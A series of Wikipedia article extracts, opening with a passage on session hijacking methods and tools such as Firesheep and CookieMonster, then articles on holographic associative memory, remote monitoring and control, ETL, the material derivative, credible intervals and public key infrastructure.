A popular method is using source-routed IP packets. This allows an attacker at pointBon the network to participate in a conversation betweenAandCby encouraging the IP packets to pass throughB'smachine.
If source-routing is turned off, the attacker can use "blind" hijacking, whereby it guesses the responses of the two machines. Thus, the attacker can send a command, but can never see the response. However, a common command would be to set a password allowing access from elsewhere on the net.
An attacker can also be "inline" betweenAandCusing a sniffing program to watch the conversation. This is known as a "man-in-the-middle attack".
HTTP protocol versions 0.8 and 0.9 lacked cookies and other features necessary for session hijacking. Version 0.9beta of Mosaic Netscape, released on October 13, 1994, supported cookies.
Early versions of HTTP 1.0 did have some security weaknesses relating to session hijacking, but they were difficult to exploit due to the vagaries of most early HTTP 1.0 servers and browsers. As HTTP 1.0 has been designated as a fallback for HTTP 1.1 since the early 2000s—and as HTTP 1.0 servers are all essentially HTTP 1.1 servers the session hijacking problem has evolved into a nearly permanent security risk.[2][failed verification]
The introduction ofsupercookiesand other features with the modernized HTTP 1.1 has allowed for the hijacking problem to become an ongoing security problem. Webserver and browser state machine standardization has contributed to this ongoing security problem.
There are four main methods used to perpetrate a session hijack. These are:
After successfully acquiring appropriate session cookies an adversary would inject the session cookie into their browser to impersonate the victim user on the website from which the session cookie was stolen from.[5]
Attackers often rely on specialized tools to execute session hijacking attacks. One such tool isFiresheep, a Firefox extension introduced in October 2010. Firesheep demonstrated session hijacking vulnerabilities in unsecured networks by capturing unencrypted cookies from popular websites, allowing users to take over active sessions of others on the same network. The tool worked by displaying potential targets in a sidebar, enabling session access without password theft.[6]
Another widely used tool isWireshark, a network protocol analyzer that allows attackers to monitor and intercept data packets on unsecured networks. If a website does not encrypt its session cookies or authentication tokens, attackers can extract them and use them to gain unauthorized access to a victim’s account.[7]
Firesheep, aFirefoxextension introduced in October 2010, demonstrated session hijacking vulnerabilities in unsecured networks. It captured unencrypted cookies from popular websites, allowing users to take over active sessions of others on the same network. The tool worked by displaying potential targets in a sidebar, enabling session access without password theft. The websites supported includedFacebook,Twitter,Flickr,Amazon,Windows LiveandGoogle, with the ability to use scripts to add other websites.[8]Only months later, Facebook and Twitter responded by offering (and later requiring)HTTP Securethroughout.[9][10]
DroidSheep is a simple Android tool for web session hijacking (sidejacking). It listens for HTTP packets sent via a wireless (802.11) network connection and extracts the session id from these packets in order to reuse them. DroidSheep can capture sessions using the libpcap library and supports: open (unencrypted) networks, WEP encrypted networks, and WPA/WPA2 encrypted networks (PSK only). This software uses libpcap and arpspoof.[11][12]The apk was made available onGoogle Playbut it has been taken down by Google.
CookieCadger is a graphical Java app that automates sidejacking and replay of HTTP requests, to help identify information leakage from applications that use unencrypted GET requests. It is a cross-platform open-source utility based on theWiresharksuite which can monitor wired Ethernet, insecure Wi-Fi, or load a packet capture file for offline analysis. Cookie Cadger has been used to highlight the weaknesses of youth team sharing sites such as Shutterfly (used by AYSO soccer league) and TeamSnap.[13]
CookieMonster is aman-in-the-middleexploit where a third party can gainHTTPS cookiedata when the "Encrypted Sessions Only" property is not properly set. This could allow access to sites with sensitive personal or financial information. In 2008, this could affect major websites, including Gmail, Google Docs, eBay, Netflix, CapitalOne, Expedia.[14]
It is aPythonbased tool, developed by security researcher Mike Perry. Perry originally announced the vulnerability exploited by CookieMonster onBugTraqin 2007. A year later, he demonstrated CookieMonster as a proof of concept tool at Defcon 16.[15][16][17][18][19][20][21][22]
Methods to prevent session hijacking include:
|
https://en.wikipedia.org/wiki/Cookiemonster_attack
|
Forholographic data storage,holographic associative memory(HAM) is an information storage and retrieval system based on the principles ofholography. Holograms are made by using two beams of light, called a "reference beam" and an "object beam". They produce a pattern on thefilmthat contains them both. Afterwards, by reproducing the reference beam, the hologram recreates a visual image of the original object. In theory, one could use the object beam to do the same thing: reproduce the original reference beam. In HAM, the pieces of information act like the two beams. Each can be used to retrieve the other from the pattern. It can be thought of as anartificial neural networkwhich mimics the way the brain uses information. The information is presented in abstract form by a complex vector which may be expressed directly by awaveformpossessing frequency and magnitude. This waveform is analogous to electrochemical impulses believed to transmit information between biologicalneuroncells.
HAM is part of the family of analog, correlation-based, associative, stimulus-response memories, where information is mapped onto the phase orientation of complex numbers. It can be considered as acomplexvaluedartificial neural network. The holographic associative memory exhibits some remarkable characteristics. Holographs have been shown to be effective forassociativememorytasks, generalization, and pattern recognition with changeable attention. Ability of dynamic search localization is central to natural memory.[1]For example, in visual perception, humans always tend to focus on some specific objects in a pattern. Humans can effortlessly change the focus from object to object without requiring relearning. HAM provides a computational model which can mimic this ability by creating representation for focus. At the heart of this new memory lies a novel bi-modal representation of pattern and a hologram-like complex spherical weight state-space. Besides the usual advantages of associative computing, this technique also has excellent potential for fast optical realization because the underlying hyper-spherical computations can be naturally implemented on optical computations.
It is based on principle of information storage in the form of stimulus-response patterns where information is presented byphase angleorientations of complex numbers on aRiemann surface.[2]A very large number of stimulus-response patterns may be superimposed or "enfolded" on a single neural element. Stimulus-response associations may be both encoded and decoded in one non-iterative transformation. The mathematical basis requires no optimization of parameters or errorbackpropagation, unlikeconnectionistneural networks. The principal requirement is for stimulus patterns to be made symmetric ororthogonalin the complex domain. HAM typically employssigmoidpre-processing where raw inputs are orthogonalized and converted toGaussian distributions.
|
https://en.wikipedia.org/wiki/Holographic_associative_memory
|
Remote monitoring and control(M&C) systems are designed to control large or complex facilities such asfactories,power plants,network operations centers,airports, andspacecraft, with some degree ofautomation.
M&C systems may receive data fromsensors,telemetrystreams, user inputs, and pre-programmed procedures. The software may sendtelecommandstoactuators, computer systems, or other devices.
M&C systems may performclosed-loop control.
Once limited toSCADAin industrial settings, remote monitoring and control is now applied in numerous fields, including:
While this field overlaps withmachine to machinecommunications, the two are not completely identical.
|
https://en.wikipedia.org/wiki/Remote_monitoring_and_control
|
Extract, transform, load(ETL) is a three-phasecomputingprocess where data isextractedfrom an input source,transformed(includingcleaning), andloadedinto an output data container. The data can be collected from one or more sources and it can also be output to one or more destinations. ETL processing is typically executed usingsoftware applicationsbut it can also be done manually by system operators. ETL software typically automates the entire process and can be run manually or on recurring schedules either as single jobs or aggregated into a batch of jobs.
A properly designed ETL system extracts data from source systems and enforces data type and data validity standards and ensures it conforms structurally to the requirements of the output. Some ETL systems can also deliver data in a presentation-ready format so that application developers can build applications and end users can make decisions.[1]
The ETL process is often used indata warehousing.[2]ETL systems commonly integrate data from multiple applications (systems), typically developed and supported by differentvendorsor hosted on separate computer hardware. The separate systems containing the original data are frequently managed and operated by differentstakeholders. For example, a cost accounting system may combine data from payroll, sales, and purchasing.
Data extraction involves extracting data from homogeneous or heterogeneous sources; data transformation processes data by data cleaning and transforming it into a proper storage format/structure for the purposes of querying and analysis; finally, data loading describes the insertion of data into the final target database such as anoperational data store, adata mart,data lakeor a data warehouse.[3][4]
ETL processing involves extracting the data from the source system(s). In many cases, this represents the most important aspect of ETL, since extracting data correctly sets the stage for the success of subsequent processes. Most data-warehousing projects combine data from different source systems. Each separate system may also use a different data organization and/orformat. Common data-source formats includerelational databases,flat-file databases,XML, andJSON, but may also include non-relational database structures such asIBM Information Management Systemor other data structures such asVirtual Storage Access Method (VSAM)orIndexed Sequential Access Method (ISAM), or even formats fetched from outside sources by means such as aweb crawlerordata scraping. The streaming of the extracted data source and loading on-the-fly to the destination database is another way of performing ETL when no intermediate data storage is required.
An intrinsic part of the extraction involves data validation to confirm whether the data pulled from the sources has the correct/expected values in a given domain (such as a pattern/default or list of values). If the data fails the validation rules, it is rejected entirely or in part. The rejected data is ideally reported back to the source system for further analysis to identify and to rectify incorrect records or performdata wrangling.
In thedata transformationstage, a series of rules or functions are applied to the extracted data in order to prepare it for loading into the end target.
An important function of transformation isdata cleansing, which aims to pass only "proper" data to the target. The challenge when different systems interact is in the relevant systems' interfacing and communicating. Character sets that may be available in one system may not be in others.
In other cases, one or more of the following transformation types may be required to meet the business and technical needs of the server or data warehouse:
The load phase loads the data into the end target, which can be any data store including a simple delimited flat file or adata warehouse. Depending on the requirements of the organization, this process varies widely. Some data warehouses may overwrite existing information with cumulative information; updating extracted data is frequently done on a daily, weekly, or monthly basis. Other data warehouses (or even other parts of the same data warehouse) may add new data in a historical form at regular intervals – for example, hourly. To understand this, consider a data warehouse that is required to maintain sales records of the last year. This data warehouse overwrites any data older than a year with newer data. However, the entry of data for any one year window is made in a historical manner. The timing and scope to replace or append are strategic design choices dependent on the time available and thebusinessneeds. More complex systems can maintain a history andaudit trailof all changes to the data loaded in the data warehouse.
As the load phase interacts with a database, the constraints defined in the database schema – as well as in triggers activated upon data load – apply (for example, uniqueness,referential integrity, mandatory fields), which also contribute to the overall data quality performance of the ETL process.
A real-life ETL cycle may consist of additional execution steps, for example:
ETL processes can involve considerable complexity, and significant operational problems can occur with improperly designed ETL systems.
The range of data values or data quality in an operational system may exceed the expectations of designers at the time validation and transformation rules are specified.Data profilingof a source during data analysis can identify the data conditions that must be managed by transform rules specifications, leading to an amendment of validation rules explicitly and implicitly implemented in the ETL process.
Data warehouses are typically assembled from a variety of data sources with different formats and purposes. As such, ETL is a key process to bring all the data together in a standard, homogeneous environment.
Design analysis[5]should establish thescalabilityof an ETL system across the lifetime of its usage – including understanding the volumes of data that must be processed withinservice level agreements. The time available to extract from source systems may change, which may mean the same amount of data may have to be processed in less time. Some ETL systems have to scale to process terabytes of data to update data warehouses with tens of terabytes of data. Increasing volumes of data may require designs that can scale from dailybatchto multiple-day micro batch to integration withmessage queuesor real-time change-data-capture for continuous transformation and update.
Unique keysplay an important part in all relational databases, as they tie everything together. A unique key is a column that identifies a given entity, whereas aforeign keyis a column in another table that refers to a primary key. Keys can comprise several columns, in which case they are composite keys. In many cases, the primary key is an auto-generated integer that has no meaning for thebusiness entitybeing represented, but solely exists for the purpose of the relational database – commonly referred to as asurrogate key.
As there is usually more than one data source getting loaded into the warehouse, the keys are an important concern to be addressed. For example: customers might be represented in several data sources, with theirSocial Security numberas the primary key in one source, their phone number in another, and a surrogate in the third. Yet a data warehouse may require the consolidation of all the customer information into onedimension.
A recommended way to deal with the concern involves adding a warehouse surrogate key, which is used as a foreign key from the fact table.[6]
Usually, updates occur to a dimension's source data, which obviously must be reflected in the data warehouse.
If the primary key of the source data is required for reporting, the dimension already contains that piece of information for each row. If the source data uses a surrogate key, the warehouse must keep track of it even though it is never used in queries or reports; it is done by creating alookup tablethat contains the warehouse surrogate key and the originating key.[7]This way, the dimension is not polluted with surrogates from various source systems, while the ability to update is preserved.
The lookup table is used in different ways depending on the nature of the source data.
There are 5 types to consider;[7]three are included here:
ETL vendors benchmark their record-systems at multiple TB (terabytes) per hour (or ~1 GB per second) using powerful servers with multiple CPUs, multiple hard drives, multiple gigabit-network connections, and much memory.
In real life, the slowest part of an ETL process usually occurs in the database load phase. Databases may perform slowly because they have to take care of concurrency, integrity maintenance, and indices. Thus, for better performance, it may make sense to employ:
Still, even using bulk operations, database access is usually the bottleneck in the ETL process. Some common methods used to increase performance are:
Whether to do certain operations in the database or outside may involve a trade-off. For example, removing duplicates usingdistinctmay be slow in the database; thus, it makes sense to do it outside. On the other side, if usingdistinctsignificantly (x100) decreases the number of rows to be extracted, then it makes sense to remove duplications as early as possible in the database before unloading data.
A common source of problems in ETL is a big number of dependencies among ETL jobs. For example, job "B" cannot start while job "A" is not finished. One can usually achieve better performance by visualizing all processes on a graph, and trying to reduce the graph making maximum use ofparallelism, and making "chains" of consecutive processing as short as possible. Again, partitioning of big tables and their indices can really help.
Another common issue occurs when the data are spread among several databases, and processing is done in those databases sequentially. Sometimes database replication may be involved as a method of copying data between databases – it can significantly slow down the whole process. The common solution is to reduce the processing graph to only three layers:
This approach allows processing to take maximum advantage of parallelism. For example, if you need to load data into two databases, you can run the loads in parallel (instead of loading into the first – and then replicating into the second).
Sometimes processing must take place sequentially. For example, dimensional (reference) data are needed before one can get and validate the rows for main"fact" tables.
Some ETL software implementations includeparallel processing. This enables a number of methods to improve overall performance of ETL when dealing with large volumes of data.
ETL applications implement three main types of parallelism:
All three types of parallelism usually operate combined in a single job or task.
An additional difficulty comes with making sure that the data being uploaded is relatively consistent. Because multiple source databases may have different update cycles (some may be updated every few minutes, while others may take days or weeks), an ETL system may be required to hold back certain data until all sources are synchronized. Likewise, where a warehouse may have to be reconciled to the contents in a source system or with the general ledger, establishing synchronization and reconciliation points becomes necessary.
Data warehousing procedures usually subdivide a big ETL process into smaller pieces running sequentially or in parallel. To keep track of data flows, it makes sense to tag each data row with "row_id", and tag each piece of the process with "run_id". In case of a failure, having these IDs help to roll back and rerun the failed piece.
Best practice also calls forcheckpoints, which are states when certain phases of the process are completed. Once at a checkpoint, it is a good idea to write everything to disk, clean out some temporary files, log the state, etc.
An established ETL framework may improve connectivity andscalability.[citation needed]A good ETL tool must be able to communicate with the many differentrelational databasesand read the various file formats used throughout an organization. ETL tools have started to migrate intoenterprise application integration, or evenenterprise service bus, systems that now cover much more than just the extraction, transformation, and loading of data. Many ETL vendors now havedata profiling,data quality, andmetadatacapabilities. A common use case for ETL tools include converting CSV files to formats readable by relational databases. A typical translation of millions of records is facilitated by ETL tools that enable users to input csv-like data feeds/files and import them into a database with as little code as possible.
ETL tools are typically used by a broad range of professionals – from students in computer science looking to quickly import large data sets to database architects in charge of company account management, ETL tools have become a convenient tool that can be relied on to get maximum performance. ETL tools in most cases contain a GUI that helps users conveniently transform data, using a visual data mapper, as opposed to writing large programs to parse files and modify data types.
While ETL tools have traditionally been for developers and IT staff, research firm Gartner wrote that the new trend is to provide these capabilities to business users so they can themselves create connections and data integrations when needed, rather than going to the IT staff.[8]Gartner refers to these non-technical users as Citizen Integrators.[9]
Inonline transaction processing(OLTP) applications, changes from individual OLTP instances are detected and logged into a snapshot, or batch, of updates. An ETL instance can be used to periodically collect all of these batches, transform them into a common format, and load them into a data lake or warehouse.[1]
Data virtualizationcan be used to advance ETL processing. The application of data virtualization to ETL allowed solving the most common ETL tasks ofdata migrationand application integration for multiple dispersed data sources. Virtual ETL operates with the abstracted representation of the objects or entities gathered from the variety of relational, semi-structured, andunstructured datasources. ETL tools can leverage object-oriented modeling and work with entities' representations persistently stored in a centrally locatedhub-and-spokearchitecture. Such a collection that contains representations of the entities or objects gathered from the data sources for ETL processing is called a metadata repository and it can reside in memory or be made persistent. By using a persistent metadata repository, ETL tools can transition from one-time projects to persistent middleware, performing data harmonization anddata profilingconsistently and in near-real time.
Extract, load, transform(ELT) is a variant of ETL where the extracted data is loaded into the target system first.[10]The architecture for the analytics pipeline shall also consider where to cleanse and enrich data[10]as well as how to conform dimensions.[1]Some of the benefits of an ELT process include speed and the ability to more easily handle both unstructured and structured data.[11]
Ralph KimballandJoe Caserta's book The Data Warehouse ETL Toolkit, (Wiley, 2004), which is used as a textbook for courses teaching ETL processes in data warehousing, addressed this issue.[12]
Cloud-based data warehouses likeAmazon Redshift, GoogleBigQuery,Microsoft Azure Synapse AnalyticsandSnowflake Inc.have been able to provide highly scalable computing power. This lets businesses forgo preload transformations and replicate raw data into their data warehouses, where it can transform them as needed usingSQL.
After having used ELT, data may be processed further and stored in a data mart.[13]
Most data integration tools skew towards ETL, while ELT is popular in database and data warehouse appliances. Similarly, it is possible to perform TEL (Transform, Extract, Load) where data is first transformed on a blockchain (as a way of recording changes to data, e.g., token burning) before extracting and loading into another data store.[14]
|
https://en.wikipedia.org/wiki/Extract,_transform,_load
|
Incontinuum mechanics, thematerial derivative[1][2]describes the timerate of changeof some physical quantity (likeheatormomentum) of amaterial elementthat is subjected to a space-and-time-dependentmacroscopic velocity field. The material derivative can serve as a link betweenEulerianandLagrangiandescriptions of continuumdeformation.[3]
For example, influid dynamics, the velocity field is theflow velocity, and the quantity of interest might be thetemperatureof the fluid. In this case, the material derivative then describes the temperature change of a certainfluid parcelwith time, as it flows along itspathline(trajectory).
There are many other names for the material derivative, including:
The material derivative is defined for anytensor fieldythat ismacroscopic, with the sense that it depends only on position and time coordinates,y=y(x,t):DyDt≡∂y∂t+u⋅∇y,{\displaystyle {\frac {\mathrm {D} y}{\mathrm {D} t}}\equiv {\frac {\partial y}{\partial t}}+\mathbf {u} \cdot \nabla y,}where∇yis thecovariant derivativeof the tensor, andu(x,t)is theflow velocity. Generally the convective derivative of the fieldu·∇y, the one that contains the covariant derivative of the field, can be interpreted both as involving thestreamlinetensor derivativeof the fieldu·(∇y), or as involving the streamlinedirectional derivativeof the field(u·∇)y, leading to the same result.[10]Only this spatial term containing the flow velocity describes the transport of the field in the flow, while the other describes the intrinsic variation of the field, independent of the presence of any flow. Confusingly, sometimes the name "convective derivative" is used for the whole material derivativeD/Dt, instead for only the spatial termu·∇.[2]The effect of the time-independent terms in the definitions are for the scalar and tensor case respectively known asadvectionand convection.
For example, for a macroscopicscalar fieldφ(x,t)and a macroscopicvector fieldA(x,t)the definition becomes:DφDt≡∂φ∂t+u⋅∇φ,DADt≡∂A∂t+u⋅∇A.{\displaystyle {\begin{aligned}{\frac {\mathrm {D} \varphi }{\mathrm {D} t}}&\equiv {\frac {\partial \varphi }{\partial t}}+\mathbf {u} \cdot \nabla \varphi ,\\[3pt]{\frac {\mathrm {D} \mathbf {A} }{\mathrm {D} t}}&\equiv {\frac {\partial \mathbf {A} }{\partial t}}+\mathbf {u} \cdot \nabla \mathbf {A} .\end{aligned}}}
In the scalar case∇φis simply thegradientof a scalar, while∇Ais the covariant derivative of the macroscopic vector (which can also be thought of as theJacobian matrixofAas a function ofx).
In particular for a scalar field in a three-dimensionalCartesian coordinate system(x1,x2,x3), the components of the velocityuareu1,u2,u3, and the convective term is then:u⋅∇φ=u1∂φ∂x1+u2∂φ∂x2+u3∂φ∂x3.{\displaystyle \mathbf {u} \cdot \nabla \varphi =u_{1}{\frac {\partial \varphi }{\partial x_{1}}}+u_{2}{\frac {\partial \varphi }{\partial x_{2}}}+u_{3}{\frac {\partial \varphi }{\partial x_{3}}}.}
Consider a scalar quantityφ=φ(x,t), wheretis time andxis position. Hereφmay be some physical variable such as temperature or chemical concentration. The physical quantity, whose scalar quantity isφ, exists in a continuum, and whose macroscopic velocity is represented by the vector fieldu(x,t).
The (total) derivative with respect to time ofφis expanded using the multivariatechain rule:ddtφ(x(t),t)=∂φ∂t+x˙⋅∇φ.{\displaystyle {\frac {\mathrm {d} }{\mathrm {d} t}}\varphi (\mathbf {x} (t),t)={\frac {\partial \varphi }{\partial t}}+{\dot {\mathbf {x} }}\cdot \nabla \varphi .}
It is apparent that this derivative is dependent on the vectorx˙≡dxdt,{\displaystyle {\dot {\mathbf {x} }}\equiv {\frac {\mathrm {d} \mathbf {x} }{\mathrm {d} t}},}which describes achosenpathx(t)in space. For example, ifx˙=0{\displaystyle {\dot {\mathbf {x} }}=\mathbf {0} }is chosen, the time derivative becomes equal to the partial time derivative, which agrees with the definition of apartial derivative: a derivative taken with respect to some variable (time in this case) holding other variables constant (space in this case). This makes sense because ifx˙=0{\displaystyle {\dot {\mathbf {x} }}=0}, then the derivative is taken at someconstantposition. This static position derivative is called the Eulerian derivative.
An example of this case is a swimmer standing still and sensing temperature change in a lake early in the morning: the water gradually becomes warmer due to heating from the sun. In which case the term∂φ/∂t{\displaystyle {\partial \varphi }/{\partial t}}is sufficient to describe the rate of change of temperature.
If the sun is not warming the water (i.e.∂φ/∂t=0{\displaystyle {\partial \varphi }/{\partial t}=0}), but the pathx(t)is not a standstill, the time derivative ofφmay change due to the path. For example, imagine the swimmer is in a motionless pool of water, indoors and unaffected by the sun. One end happens to be at a constant high temperature and the other end at a constant low temperature. By swimming from one end to the other the swimmer senses a change of temperature with respect to time, even though the temperature at any given (static) point is a constant. This is because the derivative is taken at the swimmer's changing location and the second term on the rightx˙⋅∇φ{\displaystyle {\dot {\mathbf {x} }}\cdot \nabla \varphi }is sufficient to describe the rate of change of temperature. A temperature sensor attached to the swimmer would show temperature varying with time, simply due to the temperature variation from one end of the pool to the other.
The material derivative finally is obtained when the pathx(t)is chosen to have a velocity equal to the fluid velocityx˙=u.{\displaystyle {\dot {\mathbf {x} }}=\mathbf {u} .}
That is, the path follows the fluid current described by the fluid's velocity fieldu. So, the material derivative of the scalarφisDφDt=∂φ∂t+u⋅∇φ.{\displaystyle {\frac {\mathrm {D} \varphi }{\mathrm {D} t}}={\frac {\partial \varphi }{\partial t}}+\mathbf {u} \cdot \nabla \varphi .}
An example of this case is a lightweight, neutrally buoyant particle swept along a flowing river and experiencing temperature changes as it does so. The temperature of the water locally may be increasing due to one portion of the river being sunny and the other in a shadow, or the water as a whole may be heating as the day progresses. The changes due to the particle's motion (itself caused by fluid motion) is calledadvection(or convection if a vector is being transported).
The definition above relied on the physical nature of a fluid current; however, no laws of physics were invoked (for example, it was assumed that a lightweight particle in a river will follow the velocity of the water), but it turns out that many physical concepts can be described concisely using the material derivative. The general case of advection, however, relies on conservation of mass of the fluid stream; the situation becomes slightly different if advection happens in a non-conservative medium.
Only a path was considered for the scalar above. For a vector, the gradient becomes atensor derivative; fortensorfields we may want to take into account not only translation of the coordinate system due to the fluid movement but also its rotation and stretching. This is achieved by theupper convected time derivative.
It may be shown that, inorthogonal coordinates, thej-th component of the convection term of the material derivative of avector fieldA{\displaystyle \mathbf {A} }is given by[11][(u⋅∇)A]j=∑iuihi∂Aj∂qi+Aihihj(uj∂hj∂qi−ui∂hi∂qj),{\displaystyle [\left(\mathbf {u} \cdot \nabla \right)\mathbf {A} ]_{j}=\sum _{i}{\frac {u_{i}}{h_{i}}}{\frac {\partial A_{j}}{\partial q^{i}}}+{\frac {A_{i}}{h_{i}h_{j}}}\left(u_{j}{\frac {\partial h_{j}}{\partial q^{i}}}-u_{i}{\frac {\partial h_{i}}{\partial q^{j}}}\right),}
where thehiare related to themetric tensorsbyhi=gii.{\displaystyle h_{i}={\sqrt {g_{ii}}}.}
In the special case of a three-dimensionalCartesian coordinate system(x,y,z), andAbeing a 1-tensor (a vector with three components), this is just:(u⋅∇)A=(ux∂Ax∂x+uy∂Ax∂y+uz∂Ax∂zux∂Ay∂x+uy∂Ay∂y+uz∂Ay∂zux∂Az∂x+uy∂Az∂y+uz∂Az∂z)=∂(Ax,Ay,Az)∂(x,y,z)u{\displaystyle (\mathbf {u} \cdot \nabla )\mathbf {A} ={\begin{pmatrix}\displaystyle u_{x}{\frac {\partial A_{x}}{\partial x}}+u_{y}{\frac {\partial A_{x}}{\partial y}}+u_{z}{\frac {\partial A_{x}}{\partial z}}\\\displaystyle u_{x}{\frac {\partial A_{y}}{\partial x}}+u_{y}{\frac {\partial A_{y}}{\partial y}}+u_{z}{\frac {\partial A_{y}}{\partial z}}\\\displaystyle u_{x}{\frac {\partial A_{z}}{\partial x}}+u_{y}{\frac {\partial A_{z}}{\partial y}}+u_{z}{\frac {\partial A_{z}}{\partial z}}\end{pmatrix}}={\frac {\partial (A_{x},A_{y},A_{z})}{\partial (x,y,z)}}\mathbf {u} }
where∂(Ax,Ay,Az)∂(x,y,z){\displaystyle {\frac {\partial (A_{x},A_{y},A_{z})}{\partial (x,y,z)}}}is aJacobian matrix.
There is also avector-dot-del identityand the material derivative for a vector fieldA{\displaystyle \mathbf {A} }can be expressed as:
|
https://en.wikipedia.org/wiki/Material_derivative
|
InBayesian statistics, acredible intervalis anintervalused to characterize aprobability distribution. It is defined such that an unobservedparametervalue has a particularprobabilityγ{\displaystyle \gamma }to fall within it. For example, in an experiment that determines the distribution of possible values of the parameterμ{\displaystyle \mu }, if the probability thatμ{\displaystyle \mu }lies between 35 and 45 isγ=0.95{\displaystyle \gamma =0.95}, then35≤μ≤45{\displaystyle 35\leq \mu \leq 45}is a 95% credible interval.
Credible intervals are typically used to characterizeposterior probabilitydistributions orpredictive probabilitydistributions.[1]Their generalization to disconnected or multivariate sets is calledcredible setor credible region.
Credible intervals are aBayesiananalog toconfidence intervalsinfrequentist statistics.[2]The two concepts arise from different philosophies:[3]Bayesian intervals treat their bounds as fixed and the estimated parameter as a random variable, whereas frequentist confidence intervals treat their bounds as random variables and the parameter as a fixed value. Also, Bayesian credible intervals use (and indeed, require) knowledge of the situation-specificprior distribution, while the frequentist confidence intervals do not.
Credible sets are not unique, as any given probability distribution has an infinite number ofγ{\displaystyle \gamma }-credible sets, i.e. sets of probabilityγ{\displaystyle \gamma }. For example, in the univariate case, there are multiple definitions for a suitable interval or set:
One may also define an interval for which themeanis the central point, assuming that the mean exists.
γ{\displaystyle \gamma }-Smallest Credible Sets (γ{\displaystyle \gamma }-SCS) can easily be generalized to the multivariate case, and are bounded by probability densitycontour lines.[4]They always contain themode, but not necessarily themean, thecoordinate-wise median, nor thegeometric median.
Credible intervals can also be estimated through the use of simulation techniques such asMarkov chain Monte Carlo.[5]
A frequentist 95%confidence intervalmeans that with a large number of repeated samples, 95% of such calculated confidence intervals would include the true value of the parameter. In frequentist terms, the parameter isfixed(cannot be considered to have a distribution of possible values) and the confidence interval israndom(as it depends on the random sample).
Bayesian credible intervals differ from frequentist confidence intervals by two major aspects:
For the case of a single parameter and data that can be summarised in a singlesufficient statistic, it can be shown that the credible interval and the confidence interval coincide if the unknown parameter is alocation parameter(i.e. the forward probability function has the formPr(x|μ)=f(x−μ){\displaystyle \mathrm {Pr} (x|\mu )=f(x-\mu )}), with a prior that is a uniform flat distribution;[6]and also if the unknown parameter is ascale parameter(i.e. the forward probability function has the formPr(x|s)=f(x/s){\displaystyle \mathrm {Pr} (x|s)=f(x/s)}), with aJeffreys' priorPr(s|I)∝1/s{\displaystyle \mathrm {Pr} (s|I)\;\propto \;1/s}[6]— the latter following because taking the logarithm of such a scale parameter turns it into a location parameter with a uniform distribution.
But these are distinctly special (albeit important) cases; in general no such equivalence can be made.
|
https://en.wikipedia.org/wiki/Credible_interval
|
Apublic key infrastructure(PKI) is a set of roles, policies, hardware, software and procedures needed to create, manage, distribute, use, store and revokedigital certificatesand managepublic-key encryption.
The purpose of a PKI is to facilitate the secure electronic transfer of information for a range of network activities such as e-commerce, internet banking and confidential email. It is required for activities where simple passwords are an inadequate authentication method and more rigorous proof is required to confirm the identity of the parties involved in the communication and to validate the information being transferred.
Incryptography, a PKI is an arrangement thatbindspublic keyswith respective identities of entities (like people and organizations).[1][2]The binding is established through a process of registration and issuance of certificates at and by acertificate authority(CA). Depending on the assurance level of the binding, this may be carried out by an automated process or under human supervision. When done over a network, this requires using a secure certificate enrollment or certificate management protocol such asCMP.
The PKI role that may be delegated by a CA to assure valid and correct registration is called aregistration authority(RA). An RA is responsible for accepting requests for digital certificates and authenticating the entity making the request.[3]TheInternet Engineering Task Force's RFC 3647 defines an RA as "An entity that is responsible for one or more of the following functions: the identification and authentication of certificate applicants, the approval or rejection of certificate applications, initiating certificate revocations or suspensions under certain circumstances, processing subscriber requests to revoke or suspend their certificates, and approving or rejecting requests by subscribers to renew or re-key their certificates. RAs, however, do not sign or issue certificates (i.e., an RA is delegated certain tasks on behalf of a CA)."[4]WhileMicrosoftmay have referred to a subordinate CA as an RA,[5]this is incorrect according to the X.509 PKI standards. RAs do not have the signing authority of a CA and only manage the vetting and provisioning of certificates. So in the Microsoft PKI case, the RA functionality is provided either by the Microsoft Certificate Services web site or throughActive DirectoryCertificate Services that enforces Microsoft Enterprise CA, and certificate policy through certificate templates and manages certificate enrollment (manual or auto-enrollment). In the case of Microsoft Standalone CAs, the function of RA does not exist since all of the procedures controlling the CA are based on the administration and access procedure associated with the system hosting the CA and the CA itself rather than Active Directory. Most non-Microsoft commercial PKI solutions offer a stand-alone RA component.
An entity must be uniquely identifiable within each CA domain on the basis of information about that entity. A third-partyvalidation authority(VA) can provide this entity information on behalf of the CA.
TheX.509standard defines the most commonly used format forpublic key certificates.[6]
PKI provides "trust services" - in plain terms trusting the actions or outputs of entities, be they people or computers. Trust service objectives respect one or more of the following capabilities: Confidentiality, Integrity and Authenticity (CIA).
Confidentiality:Assurance that no entity can maliciously or unwittingly view a payload in clear text. Data is encrypted to make it secret, such that even if it was read, it appears as gibberish. Perhaps the most common use of PKI for confidentiality purposes is in the context of Transport Layer Security (TLS). TLS is a capability underpinning the security of data in transit, i.e. during transmission. A classic example of TLS for confidentiality is when using a web browser to log on to a service hosted on an internet based web site by entering a password.
Integrity:Assurance that if an entity changed (tampered) with transmitted data in the slightest way, it would be obvious it happened as its integrity would have been compromised. Often it is not of utmost importance to prevent the integrity being compromised (tamper proof), however, it is of utmost importance that if integrity is compromised there is clear evidence of it having done so (tamper evident).
Authenticity:Assurance that every entity has certainty of what it is connecting to, or can evidence its legitimacy when connecting to a protected service. The former is termed server-side authentication - typically used when authenticating to a web server using a password. The latter is termed client-side authentication - sometimes used when authenticating using a smart card (hosting a digital certificate and private key).
Public-key cryptographyis acryptographictechnique that enables entities tosecurely communicateon an insecure public network, and reliably verify the identity of an entity viadigital signatures.[7]
A public key infrastructure (PKI) is a system for the creation, storage, and distribution ofdigital certificates, which are used to verify that a particular public key belongs to a certain entity. The PKI creates digital certificates that map public keys to entities, securely stores these certificates in a central repository and revokes them if needed.[8][9][10]
A PKI consists of:[9][11][12]
The primary role of the CA is todigitally signand publish thepublic keybound to a given user. This is done using the CA's own private key, so that trust in the user key relies on one's trust in the validity of the CA's key. When the CA is a third party separate from the user and the system, then it is called the Registration Authority (RA), which may or may not be separate from the CA.[13]The key-to-user binding is established, depending on the level of assurance the binding has, by software or under human supervision.
The termtrusted third party(TTP) may also be used forcertificate authority(CA). Moreover, PKI is itself often used as a synonym for a CA implementation.[14]
A certificate may be revoked before it expires, which signals that it is no longer valid. Without revocation, an attacker would be able to exploit such a compromised or mis-issued certificate until expiry.[15]Hence, revocation is an important part of a public key infrastructure.[16]Revocation is performed by the issuingcertificate authority, which produces acryptographically authenticatedstatement of revocation.[17]
